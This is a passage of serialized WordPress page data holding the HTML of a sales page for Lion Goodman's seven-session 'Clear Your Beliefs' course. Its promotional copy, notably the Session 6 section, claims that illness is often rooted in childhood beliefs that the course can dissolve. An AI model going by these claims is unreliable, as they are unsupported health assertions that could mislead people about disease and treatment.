success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60547:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really 